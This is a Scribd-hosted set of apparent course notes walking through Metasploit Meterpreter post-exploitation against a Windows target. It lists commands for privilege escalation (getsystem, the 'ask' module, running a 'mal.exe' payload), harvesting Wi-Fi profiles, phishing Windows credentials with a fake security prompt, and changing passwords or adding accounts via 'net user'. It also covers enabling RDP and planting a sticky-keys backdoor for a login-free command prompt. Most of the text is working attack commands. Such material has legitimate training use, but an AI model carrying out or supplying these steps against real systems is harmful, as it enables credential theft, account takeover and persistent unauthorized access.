Scribd
Upload
15 views13 pages

Meter Preter

The document outlines various operations and commands for using Metasploit to interact with a target machine, including taking screenshots, checking idle time, and obtaining admin access. It details commands for gathering Wi-Fi information, performing phishing attacks, creating new users, and enabling Remote Desktop connections. Additionally, it explains how to access the command prompt on the target machine without logging in using sticky keys.

Uploaded by

Jayanto Mukhopadhyay
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
15 views13 pages

Meter Preter

The document outlines various operations and commands for using Metasploit to interact with a target machine, including taking screenshots, checking idle time, and obtaining admin access. It details commands for gathering Wi-Fi information, performing phishing attacks, creating new users, and enabling Remote Desktop connections. Additionally, it explains how to access the command prompt on the target machine without logging in using sticky keys.

Uploaded by

Jayanto Mukhopadhyay
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 13

METASPLOIT

Session-2
Operation-Take screenshot of target machine
Command- screenshot

File has been stored in the root folder-

Operation- To show idle time of target machine


Command-idletime

1
Operation- To show the disk details of target machine
Command- show_mount

Operation- Enable or Disable target machine’s keyboard


Command- uictl disablekeyboard

Command- uictl enablekeyboard

2
Operation- Display the user that the Meterpreter server is
runningas on the host
Command- getuid

Operation- Get the Admin User access of Target’s machine.


Userwill get the pop up to provide admin access
First background the current session

Command- background

User below module to get admin access

Command- use windows/local/ask

Set the session id for the

moduleCommand- set session

<id>Command- run

3
Target machine will get below pop up

To get admin use access of host machine

Command- getsystem

To see current user

Command- getuid

4
Operation- Get all the wi-fi information from target machine
onwhich it has connected till now
To search the correct wireless module

Command- search wireless

Command– use windows/wlan/wlan_profile or use <module no.>

Command- set session <id>

Command– run

Currently no wi-fi information available

5
Operation- Get admin access of machine directly
Command- use multi/handler

Command- run

In windows machine, run mal.exe file as an Admin. In this way also meterpreter access should be
granted

Target user provides the password on pop up

6
Command- getsystem

This time we got the admin access directly

Command- getuid

Operation- Phishing attack to get Windows Security pop up


ontarget machine that user need to enter before performing
anyoperation

Command- search phish

Command- windows/gather/phish_windows_credentials

Command- set session <id>

Command– run

7
On windows machine we’ll get the pop up

Windows password will be displayed on Kali, once use enter it’s password

8
Operation- Create a new user in target machine and change
it’spassword
To interact with the session

Command- sessions -i <id>

To get the access of command prompt

Command- shell

To show all the users

Command- net user

Change password for existing user

Command- net user <ExistingUserName> <new_password>

Changed the password for user- “gatson” to 1234

9
To add a new user

Command- net user <NewUserToAdd> /add

Operation- Take Remote Desktop connection of Target machine


Command- search rdp

Command- use windows/manage/enable_rdp

Command- set session <id>

Command- run

10
To check if RDP is up, open new terminal and perform following commands to check

Command- nmap -p3389 <Target Machine IP>

NotePort no- 3389 is used for Remote Desktop Connection

Command- rdesktop <Target Machine IP>

Remote Desktop got enabled

11
Operation- Get target machine’s command prompt’s access
evenwithout logging in into client machine (using sticky keys)
Command- search rdp

Command- use windows/manage/sticky_keys

Command- rdesktop <target machine id>

Press Shift keys 5 times, it will open the command prompt

12

You might also like